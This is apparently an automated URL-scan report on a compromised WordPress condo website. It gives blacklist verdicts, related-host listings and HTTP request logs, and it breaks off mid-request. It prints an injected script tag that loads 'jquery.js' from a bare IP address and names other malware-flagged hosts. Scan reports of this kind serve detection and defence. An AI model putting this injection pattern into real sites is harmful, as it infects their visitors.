Overview

URL 1bloorwestcondo.ca/floor-plan-pricing
IP108.167.172.145
ASN
Location United States
Report completed2018-12-02 14:10:15 CET
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2018-12-02 2 1bloorwestcondo.ca/floor-plan-pricing Malware
2018-12-02 2 1bloorwestcondo.ca/floor-plan-pricing/ Malware
2018-12-02 2 1bloorwestcondo.ca/wp-content/plugins/contact-form-7/includes/js/scripts.js (...) Malware
2018-12-02 2 1bloorwestcondo.ca/wp-content/themes/1bloorwestcondo/assets/js/custom.js?ver=3.3 Malware
2018-12-02 2 134.249.116.78/jquery.js Malware
2018-12-02 2 185.143.221.14/index.php?cnt=23180211 Malware
2018-12-02 2 www.hibids10.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 108.167.172.145

Date UQ / IDS / BL URL IP
2019-05-08 16:39:36 +0200
0 - 0 - 16 myarccondos.ca/ 108.167.172.145
2019-05-07 08:51:20 +0200
0 - 0 - 3 my75esplanadecondos.ca/ 108.167.172.145
2019-03-21 11:59:46 +0100
0 - 0 - 0 www.bms.edu.lv/ 108.167.172.145
2018-12-02 10:42:29 +0100
0 - 0 - 5 1bloorwestcondo.ca/floor-plan-pricing 108.167.172.145
2018-10-16 15:50:08 +0200
0 - 0 - 0 bexleytheatreparents.org 108.167.172.145
2018-09-30 16:57:49 +0200
0 - 0 - 1 a-uic.com/7343392738ca883f2cb04f2747940fff 108.167.172.145
2018-02-12 15:24:40 +0100
0 - 0 - 0 transportadoracaribeensueno.com/qIPy/ 108.167.172.145
2018-02-12 15:06:43 +0100
0 - 0 - 0 transportadoracaribeensueno.com/qIPy/ 108.167.172.145
2018-02-12 15:02:48 +0100
0 - 0 - 0 transportadoracaribeensueno.com/INCORRECT-INVOICE/ 108.167.172.145
2018-02-12 14:01:17 +0100
0 - 0 - 0 transportadoracaribeensueno.com 108.167.172.145

Last 10 reports on ASN:

Date UQ / IDS / BL URL IP
2019-05-22 01:43:26 +0200
0 - 0 - 1 url.222bz.com/down/sohuva-v5.0.3.32@248_30842.exe 139.224.39.0
2019-05-22 01:43:23 +0200
0 - 0 - 1 url.222bz.com/down/sony%20vegas%20pro11%E6%B3 (...) 114.55.188.114
2019-05-22 01:43:22 +0200
0 - 4 - 1 url.222bz.com/down/microsoftofficepowerpoint2 (...) 139.224.39.0
2019-05-22 01:43:19 +0200
0 - 0 - 1 url.222bz.com/down/lol%E9%9F%A952016@154_1072 (...) 139.224.39.0
2019-05-22 01:43:18 +0200
0 - 4 - 1 url.222bz.com/down/ufffdufffdufffdufffdufffdu (...) 139.224.39.0
2019-05-22 01:43:17 +0200
0 - 2 - 1 url.222bz.com/down/mp3@289_72908.exe 139.224.39.0
2019-05-22 01:43:16 +0200
0 - 4 - 1 url.222bz.com/down/memtest%E5%86%85%E5%AD%98% (...) 114.55.188.114
2019-05-22 01:43:14 +0200
0 - 4 - 1 url.222bz.com/down/b%E8%BD%BD%E5%99%A80.4.7.7 (...) 114.55.188.114
2019-05-22 01:43:14 +0200
0 - 0 - 1 url.222bz.com/down/photoshop@212_64955.exe 114.55.188.114
2019-05-22 01:43:13 +0200
0 - 4 - 1 url.222bz.com/down/photoshop%20cs6%20%E5%AE%8 (...) 114.55.188.114

Last 1 reports on domain: 1bloorwestcondo.ca

Date UQ / IDS / BL URL IP
2018-12-02 10:42:29 +0100
0 - 0 - 5 1bloorwestcondo.ca/floor-plan-pricing 108.167.172.145


JavaScript

Executed Scripts (10)


Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 55, repeated: 1) - SHA256: b1247cfc4a293243fe51e76445f0c7fbdec493b931a59e722826bf77015b9514

                                        < script src = "http://134.249.116.78/jquery.js" > < /script>
                                    


HTTP Transactions (54)


Request Response
                                        
                                            GET /floor-plan-pricing HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         108.167.172.145
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:44 GMT
Content-Length: 0
Connection: keep-alive
Location: http://1bloorwestcondo.ca/floor-plan-pricing/


--- Additional Info ---

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /floor-plan-pricing/ HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Link: <http://1bloorwestcondo.ca/wp-json/>; rel="https://api.w.org/", <http://1bloorwestcondo.ca/?p=12>; rel=shortlink
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7566
Md5:    6772463c8ccbd709ab4e93ab7ab94f8e
Sha1:   b35fe3b08e192579c423c7f5f25e8af994e8b69d
Sha256: b72af7ce2a86668be9511d91946469072ebf26d960bb7c08ba7ab712bdbbfae4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.7 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:43 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /css?family=Montserrat%3Aregular%2C700&ver=4.9.7 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         216.58.207.234
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Sun, 02 Dec 2018 13:09:45 GMT
Date: Sun, 02 Dec 2018 13:09:45 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   238
Md5:    b15b7b3f338e45aad2ce6a4c0bfd77fb
Sha1:   f7276b43bd01badd4c09e1f59fb83b9fc5ce09bf
Sha256: ad32ad4b8fe1955de387a7cc8daa6edec26dbe46eaf49e765028e66208b54bf1
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         172.217.21.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 02 Dec 2018 13:09:45 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    60a5a6334ad1a90fcdf66e35afa5c433
Sha1:   4784cc9ed7956c4582e243a748db18c5d74acdb4
Sha256: 726828cf1189a6a666d1832f7edd115b73064552f6a85a867c5ccf7499c28f04
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         172.217.21.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 02 Dec 2018 13:09:45 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    d9d754520ae3340aa37cca6115eee05b
Sha1:   a0320372760d99c762cb2eb4b37f776625ef1b33
Sha256: 7dc8284c51c9a38dc1bf03bd28857ea5336e8f5c564eddbb1c9082ee43c93738
                                        
                                            GET /wp-content/uploads/stm_fonts/stm/stm.css?ver=1.0 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sun, 18 Sep 2016 05:03:34 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   794
Md5:    f3a5e97c24e63bcf48a6bdfc3b98a917
Sha1:   52cce5b0adb95068adb77b38c0cf03dd1bbdf667
Sha256: 080d0424a9de2f33c3f119b9cbd353fa89d1dd190c0b71abb1a01d119505ab92
                                        
                                            GET /wp-content/themes/1bloorwestcondo/style.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sun, 18 Sep 2016 15:12:20 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   650
Md5:    c4c10802f753991632f27292bb906e9c
Sha1:   19690cf760e43648cb5d668e4af8fe1e787676b8
Sha256: 10fb1ddfae70cf0ece9261d1595af5cab21d96fa5599b5bb8255d233b59c9e11
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 409 Conflict
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Content-Length: 83
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   83
Md5:    26267cd8990f15d3bbea71684a6d5995
Sha1:   ac3b38cf3fe0e112bb6aeb7e05226b7133575d93
Sha256: 769e8ab745a0fe4bf811036e75a8630e38c50a18cb3e24d539ce4a0722c7c85e
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/font-awesome.min.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 17 Jun 2016 12:34:02 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   7502
Md5:    d75eb6fad43099947dc318299b97c3ad
Sha1:   eba4ae1b983610cd0d8e45f15432982415485e6a
Sha256: 32f0e59f2f2f5d989c39edfcc1e26f8315b06f245f8855bc903250a28cbe8f61
                                        
                                            GET /css?family=Open+Sans%3A400%2C300%2C300italic%2C400italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%26subset%3Dlatin%2Cgreek%2Cgreek-ext%2Cvietnamese%2Ccyrillic-ext%2Clatin-ext%2Ccyrillic%7CPoppins%3A400%2C500%2C300%2C600%2C700%26subset%3Dlatin%2Clatin-ext%2Cdevanagari&ver=3.3 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         216.58.207.234
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Sun, 02 Dec 2018 13:09:45 GMT
Date: Sun, 02 Dec 2018 13:09:45 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   503
Md5:    77139b29f478c8f5f65b693d9c22e78e
Sha1:   c037a216a9659ca0cdf2ac71b211f55a15308b3f
Sha256: 31d49f905b6385fbd8283881520b4edd7db73c7315b6171d1138115ce5d4b34a
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/select2.min.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 17 Jun 2016 12:34:02 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2424
Md5:    c8096e2aa5ca5ef8e169defeb54a47f4
Sha1:   4731e89601a73d4233b60591bb7503762a2d9e00
Sha256: d0603707f9981c591c3923d412a53e66598aaadf4c65b93e65b070e1d7f4202e
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/layout_1/main.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 06 Aug 2016 05:56:54 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   65980
Md5:    4a258e33e2d4c2e32efaf55593f707a8
Sha1:   42c55c188d8c78d79132baf24fce33157daab1f1
Sha256: 81061d6aeb751410f8d6f49ad6aa8881a107af3adfe63376edbcbf391f8e3d40
                                        
                                            GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:42 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/bootstrap.min.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 17 Jun 2016 12:34:02 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   24805
Md5:    ebff01cdc478da496c9113d2f4a9157e
Sha1:   f7b42ec92b4bba1ac8ccecf7ce4e9c159394ee51
Sha256: 9034b5e9b0c141c2c5661288e5027f13b80f2b489294d5a6335389a5c074ef68
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:42 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 409 Conflict
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Content-Length: 83
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   83
Md5:    26267cd8990f15d3bbea71684a6d5995
Sha1:   ac3b38cf3fe0e112bb6aeb7e05226b7133575d93
Sha256: 769e8ab745a0fe4bf811036e75a8630e38c50a18cb3e24d539ce4a0722c7c85e

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/js/bootstrap.min.js?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:39 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/css/layout_1/skin_arctic_black.css?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 17 Jun 2016 12:34:02 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   65646
Md5:    fe3fa649bb98af0e1720ff5abc3a818b
Sha1:   d88284fd9193e847651aab269a01d9e31698639b
Sha256: 0eebb2e20ddde88a295211b3e70cf8f5c2d95b5948ea986824b3a28c9a548c8d
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/js/select2.min.js?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:39 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/themes/1bloorwestcondo/assets/js/custom.js?ver=3.3 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:39 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11.2 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 05 Aug 2016 02:06:42 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   78819
Md5:    0b3fbe1902b0eb36088c7863d45fb953
Sha1:   d8e9a7ba306339907b9554e6b59c707dd8508efe
Sha256: 88a32c21a682f8c4cdc8c8271d9fa5a0807316254de9bc32376cf6ab2ce3417a
                                        
                                            GET /wp-includes/js/wp-embed.min.js?ver=4.9.7 HTTP/1.1 
